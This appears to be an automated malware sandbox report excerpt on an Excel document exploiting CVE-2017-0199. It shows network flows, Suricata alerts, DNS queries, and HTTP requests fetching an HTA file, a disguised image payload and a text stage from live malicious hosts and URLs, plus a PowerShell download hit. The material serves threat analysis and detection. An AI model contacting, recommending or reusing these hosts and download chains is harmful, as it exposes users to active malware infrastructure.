              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49164
              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49162
              Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 146.70.113.200:80
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49172
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49167
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 146.70.113.200:80
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 146.70.113.200:80
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 146.70.113.200:80
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
              Source: global trafficHTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D7018 URLDownloadToFileW,8_2_000007FE899D7018
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F2129E.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
              Source: global trafficHTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"
              Source: global trafficHTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: linkjago.me
              Source: global trafficDNS traffic detected: DNS query: 1016.filemail.com
              Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/
              Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200//
              Source: mshta.exe, 0000000F.00000003.477431887.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
              Source: mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta$
              Source: mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...
              Source: mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...893F-F
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta24
              Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC
              Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC:
              Source: mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaJ
              Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaX
